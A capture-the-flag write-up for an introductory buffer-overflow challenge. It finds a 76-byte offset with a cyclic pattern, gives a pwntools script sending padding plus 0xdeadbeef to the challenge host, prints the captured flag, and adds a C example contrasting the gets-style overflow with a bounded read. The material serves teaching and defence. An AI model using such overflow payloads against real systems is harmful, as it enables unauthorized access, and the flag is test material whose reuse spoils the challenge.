Difficulty: easy

Category: pwn

Author: xnull

Description:

### Buffer Overflow Introduction

This program asks for a password. There's a variable called is_admin that needs to equal 0xdeadbeef to get the flag.

The program uses gets(), which is vulnerable to buffer overflow.

**Access:** Connect to the binary with `ncat --ssl [host] [port]` or use pwntools.

The web interface provides educational content and downloadable source code.

Scenario

We can enter a password:

```
===== Secure Login System =====
Enter password: 11111
Access denied. is_admin = 0x0
```

Solution

We'll first find the offset at which our input overwrites is_admin, using a cyclic pattern:

```
$ cyclic 512
$ ncat --ssl <url> 31337
==== Secure Login System =====
Enter password: <cyclic output>
Access denied. is_admin = 0x61616174
$ cyclic -l 0x61616174
76
```

Now we know we have to inject the value at position 76:

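```python
from pwn import *

# Connect to the challenge service over TLS
r = remote('fa33baee-b6c9-45f4-a55a-1ac8acbd5bcc.ctf.endolum.io', 31337, ssl=True)
# 76 bytes of padding reach is_admin, then the required value packed little-endian
r.sendline(b"A"*76+p64(0xdeadbeef))
r.interactive()
```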

Flag: ENDLM{62f9941e43bc17ea6ff2aa2311f1c1ba1c3432cb25810ef6}
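Why the unbounded read ends in `is_admin = 0xdeadbeef`, and what a bounded read does with the same line, as an added C example that is not the challenge's source. The `struct login` layout (with `is_admin` directly after a 76-byte buffer, modeled on the offset found above) and the names `read_like_gets`, `read_bounded` and `is_admin_after` are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define OFFSET 76                /* from the page: cyclic -l 0x61616174 */
/* Constructed stand-in for the stack frame; the challenge source is not shown. */
struct login {
    char     password[OFFSET];   /* assumption: is_admin starts 76 bytes in */
    uint32_t is_admin;
};

/* Models gets(): copy ignores sizeof password (capped at the struct for safety). */
static void read_like_gets(struct login *f, const unsigned char *line, size_t n) {
    memset(f, 0, sizeof *f);
    memcpy(f, line, n < sizeof *f ? n : sizeof *f);
}

/* Hardened: fgets() is bounded; an over-long line is drained and rejected (-1). */
static int read_bounded(struct login *f, FILE *in) {
    memset(f, 0, sizeof *f);
    if (!fgets(f->password, sizeof f->password, in)) return -1;
    size_t n = strcspn(f->password, "\n");
    if (f->password[n] == '\n') { f->password[n] = '\0'; return 0; }
    int c, too_long = 0;
    while ((c = fgetc(in)) != EOF && c != '\n') too_long = 1;
    return too_long ? -1 : 0;
}

/* Feeds one constructed line to the chosen reader and returns is_admin. */
uint32_t is_admin_after(int hardened) {
    unsigned char line[OFFSET + 5];
    uint32_t v = 0xdeadbeef;
    struct login f;
    memset(line, 'A', OFFSET);               /* 76 filler bytes ...          */
    memcpy(line + OFFSET, &v, sizeof v);     /* ... the 32-bit value ...     */
    line[OFFSET + 4] = '\n';                 /* ... and the line terminator  */
    if (!hardened) { read_like_gets(&f, line, OFFSET + 4); return f.is_admin; }
    FILE *in = tmpfile();
    if (!in) return UINT32_MAX;              /* could not stage the input */
    fwrite(line, 1, sizeof line, in);
    rewind(in);
    int rc = read_bounded(&f, in);
    fclose(in);
    return rc == -1 ? f.is_admin : UINT32_MAX;
}

int main(void) {
    printf("0x%x 0x%x\n", (unsigned)is_admin_after(0), (unsigned)is_admin_after(1));
    return 0;
}
```

With the bounded read the over-long line is rejected and `is_admin` keeps its initial value of 0.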